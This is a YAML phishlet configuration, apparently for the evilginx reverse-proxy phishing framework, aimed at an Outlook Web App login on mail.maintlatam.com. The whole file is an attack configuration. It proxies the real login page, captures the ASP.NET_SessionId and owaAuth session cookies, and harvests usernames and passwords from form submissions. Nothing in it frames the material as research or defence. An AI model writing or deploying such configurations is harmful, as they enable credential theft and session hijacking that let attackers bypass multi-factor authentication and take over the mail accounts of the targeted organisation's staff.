name: 'OWA Maint'
author: 'Tú'
min_ver: '3.0.0'

proxy_hosts:
  - {phish_sub: 'mail', orig_sub: 'mail', domain: 'maintlatam.com', session: true, is_landing: true, auto_filter: true}

auth_tokens:
  - domain: '.maintlatam.com'
    keys: ['ASP.NET_SessionId', 'owaAuth']
    type: 'cookie'

credentials:
  username:
    key: 'username'
    search: '(.*)'
    type: 'post'
  password:
    key: 'password'
    search: '(.*)'
    type: 'post'

force_post:
  - path: '/owa/auth.owa'
    search:
      - {key: 'username', search: '.*'}
      - {key: 'password', search: '.*'}
    force:
      - {key: 'isUtf8', value: '1'}  # Solo si es requerido por el formulario real
    type: 'post'

login:
  domain: 'mail.maintlatam.com'
  path: 'owa'
